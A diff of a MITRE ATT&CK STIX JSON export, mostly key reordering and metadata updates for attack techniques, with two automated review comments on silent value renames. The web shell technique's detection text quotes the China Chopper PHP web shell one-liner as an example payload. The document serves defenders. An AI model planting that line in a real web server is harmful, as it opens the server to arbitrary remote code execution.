"url": "https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html",
"description": "O'Neill, R. (2009, May). Modern Day ELF Runtime infection via GOT poisoning. Retrieved March 15, 2020."
},
+ {
+ "source_name": "Backtrace VDSO",
+ "url": "https://backtrace.io/blog/backtrace/elf-shared-library-injection-forensics/",
+ "description": "backtrace. (2016, April 22). ELF SHARED LIBRARY INJECTION FORENSICS. Retrieved June 15, 2020."
+ },
+ {
+ "source_name": "VDSO Aug 2005",
+ "url": "https://web.archive.org/web/20051013084246/http://www.trilithium.com/johan/2005/08/linux-gate/",
+ "description": "Petersson, J. (2005, August 14). What is linux-gate.so.1?. Retrieved June 16, 2020."
+ },
+ {
+ "source_name": "Syscall 2014",
+ "url": "https://lwn.net/Articles/604515/",
+ "description": "Drysdale, D. (2014, July 16). Anatomy of a system call, part 2. Retrieved June 16, 2020."
+ },
{
"description": "Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017.",
"source_name": "ArtOfMemoryForensics"
@@ -28234,7 +29171,7 @@
"source_name": "GNU Acct"
},
{
- "url": "https://access.redhat.com/documentation/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing",
+ "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing",
"description": "Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.",
"source_name": "RHEL auditd"
},
@@ -28255,23 +29192,22 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-26T20:58:10.186Z",
+ "modified": "2020-06-20T22:28:45.232Z",
"created": "2020-01-14T01:35:00.781Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Application control"
],
+ "x_mitre_detection": "Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path. Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
"x_mitre_data_sources": [
"System calls",
"Process monitoring"
],
- "x_mitre_detection": "Monitor for malicious usage of system calls, such as ptrace and mmap, that can be used to attach to, manipulate memory, then redirect a processes' execution path. Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits) \n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ",
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Process whitelisting"
- ]
+ "x_mitre_platforms": [
+ "Linux"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
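Review bot: The `x_mitre_defense_bypassed` value `"Process whitelisting"` is replaced by `"Application control"` in this VDSO object, and again in the later hunk that ends with `"x_mitre_version": "2.1"`; in addition, `macOS` is dropped from this object's `x_mitre_platforms`. Both are silent value changes: anything downstream that filters or groups on the old string will simply stop matching, with no error to point at the cause. Since the file appears to be an upstream STIX export, the data itself should not be edited locally, but the commit description should call the rename out, e.g. `Upstream renamed the defense_bypassed value "Process whitelisting" to "Application control"; update any local filters on that string.`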
{
"external_references": [
@@ -28302,21 +29238,21 @@
],
"modified": "2020-03-23T20:41:21.147Z",
"created": "2020-02-11T18:28:44.950Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_system_requirements": [
+ "VNC server installed and listening for connections."
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Use of VNC may be legitimate depending on the environment and how it\u2019s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with VNC.",
"x_mitre_data_sources": [
"Process use of network",
"Network protocol analysis",
"Netflow/Enclave netflow"
],
- "x_mitre_system_requirements": [
- "VNC server installed and listening for connections."
+ "x_mitre_detection": "Use of VNC may be legitimate depending on the environment and how it\u2019s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with VNC.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
@@ -28368,31 +29304,13 @@
"phase_name": "initial-access"
}
],
- "modified": "2020-03-23T21:59:36.955Z",
+ "modified": "2020-06-20T22:44:36.043Z",
"created": "2017-05-31T21:31:00.645Z",
- "x_mitre_version": "2.1",
- "x_mitre_data_sources": [
- "AWS CloudTrail logs",
- "Stackdriver logs",
- "Authentication logs",
- "Process monitoring"
- ],
- "x_mitre_defense_bypassed": [
- "Firewall",
- "Host intrusion prevention systems",
- "Network intrusion detection system",
- "Process whitelisting",
- "System access controls",
- "Anti-virus"
- ],
- "x_mitre_detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n\nPerform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.",
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_effective_permissions": [
- "User",
- "Administrator"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_contributors": [
+ "Netskope",
+ "Mark Wee",
+ "Praetorian"
],
"x_mitre_platforms": [
"Linux",
@@ -28405,12 +29323,30 @@
"Office 365",
"Azure AD"
],
- "x_mitre_contributors": [
- "Netskope",
- "Mark Wee",
- "Praetorian"
+ "x_mitre_effective_permissions": [
+ "User",
+ "Administrator"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
+ "x_mitre_detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n\nPerform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.",
+ "x_mitre_defense_bypassed": [
+ "Firewall",
+ "Host intrusion prevention systems",
+ "Network intrusion detection system",
+ "Application control",
+ "System access controls",
+ "Anti-virus"
+ ],
+ "x_mitre_data_sources": [
+ "AWS CloudTrail logs",
+ "Stackdriver logs",
+ "Authentication logs",
+ "Process monitoring"
+ ],
+ "x_mitre_version": "2.1"
},
{
"object_marking_refs": [
@@ -28444,25 +29380,26 @@
"phase_name": "collection"
}
],
- "modified": "2019-07-17T21:14:04.412Z",
+ "modified": "2020-07-14T19:40:47.644Z",
"created": "2017-05-31T21:31:37.917Z",
- "x_mitre_platforms": [
- "Windows",
- "macOS"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.0",
+ "x_mitre_contributors": [
+ "Praetorian"
],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_detection": "Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.\n\nBehavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.",
"x_mitre_data_sources": [
"Process monitoring",
"File monitoring",
"API monitoring"
],
- "x_mitre_contributors": [
- "Praetorian"
+ "x_mitre_detection": "Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.\n\nBehavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.",
+ "x_mitre_permissions_required": [
+ "User"
],
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows",
+ "macOS"
+ ]
},
{
"external_references": [
@@ -28489,34 +29426,116 @@
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
}
],
- "modified": "2020-03-27T14:20:15.523Z",
+ "modified": "2020-07-01T16:32:02.272Z",
"created": "2019-04-17T22:22:24.505Z",
- "x_mitre_is_subtechnique": false,
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Host forensic analysis",
- "Signature-based detection",
- "Static File Analysis"
- ],
- "x_mitre_contributors": [
- "Deloitte Threat Library Team",
- "Sunny Neo"
+ "x_mitre_version": "1.2",
+ "x_mitre_detection": "Virtualization, sandbox, user activity, and related discovery techniques will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.",
+ "x_mitre_data_sources": [
+ "Process monitoring",
+ "Process command-line parameters"
],
"x_mitre_platforms": [
"Windows",
"macOS",
"Linux"
],
+ "x_mitre_contributors": [
+ "Deloitte Threat Library Team",
+ "Sunny Neo"
+ ],
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Host forensic analysis",
+ "Signature-based detection",
+ "Static File Analysis"
+ ],
+ "x_mitre_is_subtechnique": false
+ },
+ {
+ "id": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "description": "Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)\n\nDerivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Office applications.(Citation: Microsoft VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)\n\nAdversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.",
+ "name": "Visual Basic",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1059.005",
+ "url": "https://attack.mitre.org/techniques/T1059/005"
+ },
+ {
+ "source_name": "VB .NET Mar 2020",
+ "url": "https://devblogs.microsoft.com/vbteam/visual-basic-support-planned-for-net-5-0/",
+ "description": ".NET Team. (2020, March 11). Visual Basic support planned for .NET 5.0. Retrieved June 23, 2020."
+ },
+ {
+ "source_name": "VB Microsoft",
+ "url": "https://docs.microsoft.com/dotnet/visual-basic/",
+ "description": "Microsoft. (n.d.). Visual Basic documentation. Retrieved June 23, 2020."
+ },
+ {
+ "source_name": "Microsoft VBA",
+ "url": "https://docs.microsoft.com/office/vba/api/overview/",
+ "description": "Microsoft. (2019, June 11). Office VBA Reference. Retrieved June 23, 2020."
+ },
+ {
+ "source_name": "Microsoft VBScript",
+ "url": "https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)",
+ "description": "Microsoft. (2011, April 19). What Is VBScript?. Retrieved March 28, 2020."
+ }
+ ],
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "execution"
+ }
+ ],
+ "modified": "2020-06-25T03:32:51.046Z",
+ "created": "2020-03-09T14:29:51.508Z",
+ "x_mitre_platforms": [
+ "Windows",
+ "macOS",
+ "Linux"
+ ],
"x_mitre_data_sources": [
+ "DLL monitoring",
+ "Loaded DLLs",
+ "File monitoring",
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_detection": "Virtualization, sandbox, user activity, and related discovery techniques will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.",
- "x_mitre_version": "1.2"
+ "x_mitre_detection": "Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving VB payloads or scripts, or loading of modules associated with VB languages (ex: vbscript.dll). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programable post-compromise behaviors and could be used as indicators of detection leading back to the source.\n\nUnderstanding standard usage patterns is important to avoid a high number of false positives. If VB execution is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If VB execution is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Payloads and scripts should be captured from the file system when possible to determine their actions and intent.",
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
+ "created": "2020-02-11T18:59:50.058Z",
+ "modified": "2020-03-24T21:16:16.580Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "collection"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "credential-access"
+ }
+ ],
+ "type": "attack-pattern",
"id": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e",
"description": "Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.\n\nThis variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)",
"name": "Web Portal Capture",
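Review bot: The new `"Visual Basic"` object added in this hunk reuses the STIX id `attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67` and external id `T1059.005` of the `"VBScript"` object that an earlier hunk in this diff deletes, and widens `x_mitre_platforms` from `Windows` only to `Windows`, `macOS` and `Linux`. Consumers keyed on `id` or `external_id` are unaffected, but any local mapping that resolves techniques by `name` will no longer find `VBScript`, which is worth verifying before merge. The same hunk also adds a second `kill_chain_phases` entry, `"phase_name": "discovery"`, to the preceding virtualization/sandbox-evasion object, so that technique now appears under two tactics. A sentence in the commit description naming the T1059.005 rename and the added tactic would spare the next reader from reconstructing them out of a 100-line hunk.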
@@ -28541,32 +29560,19 @@
"source_name": "Volexity Virtual Private Keylogging"
}
],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "collection"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "credential-access"
- }
- ],
- "modified": "2020-03-24T21:16:16.580Z",
- "created": "2020-02-11T18:59:50.058Z",
- "x_mitre_system_requirements": [
- "An externally facing login portal is configured."
- ],
- "x_mitre_data_sources": [
- "File monitoring"
- ],
- "x_mitre_detection": "File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_detection": "File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.",
+ "x_mitre_data_sources": [
+ "File monitoring"
+ ],
+ "x_mitre_system_requirements": [
+ "An externally facing login portal is configured."
]
},
{
@@ -28598,9 +29604,11 @@
],
"modified": "2020-03-26T20:15:35.821Z",
"created": "2020-03-15T16:13:46.151Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for web traffic to/from known-bad or suspicious domains. ",
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
"x_mitre_data_sources": [
"Network protocol analysis",
"Process monitoring",
@@ -28608,16 +29616,24 @@
"Netflow/Enclave netflow",
"Packet capture"
],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ]
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for web traffic to/from known-bad or suspicious domains. ",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2017-05-31T21:31:13.915Z",
+ "modified": "2020-03-26T23:26:10.297Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "command-and-control"
+ }
],
+ "type": "attack-pattern",
+ "id": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Web Service",
+ "description": "Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).",
"external_references": [
{
"source_name": "mitre-attack",
@@ -28630,19 +29646,9 @@
"source_name": "University of Birmingham C2"
}
],
- "description": "Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).",
- "name": "Web Service",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "command-and-control"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-26T23:26:10.297Z",
- "created": "2017-05-31T21:31:13.915Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -28728,23 +29734,23 @@
],
"modified": "2020-03-24T12:36:24.501Z",
"created": "2020-01-30T17:48:49.395Z",
- "x_mitre_platforms": [
- "Office 365",
- "SaaS"
- ],
- "x_mitre_contributors": [
- "Johann Rehberger"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_defense_bypassed": [
+ "System Access Controls"
],
+ "x_mitre_detection": "Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.",
"x_mitre_data_sources": [
"Office 365 audit logs",
"Authentication logs"
],
- "x_mitre_detection": "Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.",
- "x_mitre_defense_bypassed": [
- "System Access Controls"
+ "x_mitre_contributors": [
+ "Johann Rehberger"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Office 365",
+ "SaaS"
+ ]
},
{
"id": "attack-pattern--c16e5409-ee53-4d79-afdc-4099dc9292df",
@@ -28808,29 +29814,29 @@
"phase_name": "persistence"
}
],
- "modified": "2020-03-25T23:10:24.898Z",
+ "modified": "2020-04-17T17:47:56.673Z",
"created": "2019-12-13T16:46:18.927Z",
- "x_mitre_platforms": [
- "Linux",
- "Windows",
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_system_requirements": [
+ "Adversary access to Web server with vulnerability or account to upload and serve the Web shell file."
],
+ "x_mitre_permissions_required": [
+ "SYSTEM",
+ "User"
+ ],
+ "x_mitre_detection": "Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) \n\n<?php @eval($_POST['password']);>\n\nNevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running cmd.exe or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) ",
"x_mitre_data_sources": [
"Process monitoring",
"Netflow/Enclave netflow",
"File monitoring",
"Authentication logs"
],
- "x_mitre_detection": "Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013) \n\n<?php @eval($_POST['password']);> \n\nNevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running cmd.exe or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) ",
- "x_mitre_permissions_required": [
- "SYSTEM",
- "User"
- ],
- "x_mitre_system_requirements": [
- "Adversary access to Web server with vulnerability or account to upload and serve the Web shell file."
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS"
+ ]
},
{
"external_references": [
@@ -28888,13 +29894,15 @@
"created": "2017-05-31T21:31:00.200Z"
},
{
- "id": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
- "description": "Adversaries may abuse the Windows command shell for execution. The Windows command shell (cmd.exe) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. \n\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may leverage cmd.exe to execute various commands and payloads. Common uses include cmd.exe /c to execute a single command, or abusing cmd.exe interactively with input and output forwarded over a command and control channel.",
- "name": "Windows Command Shell",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2020-03-09T14:12:31.196Z",
+ "modified": "2020-03-28T17:02:13.722Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "execution"
+ }
],
+ "type": "attack-pattern",
"external_references": [
{
"source_name": "mitre-attack",
@@ -28902,15 +29910,13 @@
"url": "https://attack.mitre.org/techniques/T1059/003"
}
],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "execution"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-28T17:02:13.722Z",
- "created": "2020-03-09T14:12:31.196Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Windows Command Shell",
+ "description": "Adversaries may abuse the Windows command shell for execution. The Windows command shell (cmd.exe) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. \n\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may leverage cmd.exe to execute various commands and payloads. Common uses include cmd.exe /c to execute a single command, or abusing cmd.exe interactively with input and output forwarded over a command and control channel.",
+ "id": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
"x_mitre_version": "1.0",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
@@ -28975,29 +29981,29 @@
],
"modified": "2020-03-29T23:07:55.953Z",
"created": "2020-02-04T19:17:41.767Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "SYSTEM"
],
+ "x_mitre_detection": "Monitor and investigate attempts to modify DACLs and file/directory ownership. Many of the commands used to modify DACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)",
"x_mitre_data_sources": [
"Windows event logs",
"Process command-line parameters",
"Process monitoring",
"File monitoring"
],
- "x_mitre_detection": "Monitor and investigate attempts to modify DACLs and file/directory ownership. Many of the commands used to modify DACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)",
- "x_mitre_permissions_required": [
- "User",
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Windows Management Instrumentation",
- "description": "Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)\n\nAn adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI 2015)",
+ "description": "Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)\n\nAn adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)",
"external_references": [
{
"source_name": "mitre-attack",
@@ -29019,6 +30025,11 @@
"description": "Microsoft. (n.d.). Windows Management Instrumentation. Retrieved April 27, 2016.",
"source_name": "MSDN WMI"
},
+ {
+ "source_name": "FireEye WMI SANS 2015",
